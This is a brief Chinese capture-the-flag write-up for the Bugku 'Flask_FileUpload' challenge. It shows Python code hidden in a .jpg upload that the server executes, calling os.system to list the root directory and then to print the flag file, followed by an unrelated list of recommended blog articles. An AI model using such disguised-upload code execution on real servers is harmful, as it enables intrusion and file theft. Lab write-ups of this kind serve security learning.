Bugku-web-Flask_FileUpload

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
相关推荐
柳杉12 小时前
没写一行代码!我用 ChatGPT 5.6 (Sol) 做了一个智慧充电站 3D 大屏
前端·chatgpt·数据可视化
Chengbei1112 小时前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
Henrii_历小海12 小时前
WhatsApp Web 不是手机镜像:多设备协议、本地数据流与出海获客流水线
前端·智能手机
ayqy贾杰13 小时前
Claude Fable 5 提示词泄漏,抓紧学习下
前端·后端·面试
To_OC21 小时前
别再串行写 await 了,Promise.all 才是并行请求的正确打开方式
前端·javascript·promise
vipbic21 小时前
中后台越做越乱后,我用插件化把它救回来了
前端·vue.js
Hyyy21 小时前
Computer Use 适合做什么,不适合做什么——一次真实使用后的思考
前端
小和尚同志1 天前
前端 AI 单元测试思考与落地
前端·人工智能·aigc
我是坏垠1 天前
Crypto、Cipher与Password:Java加密开发的三个核心概念
java·开发语言·python
invicinble1 天前
c端系统,其实更像一个信息展示平台
前端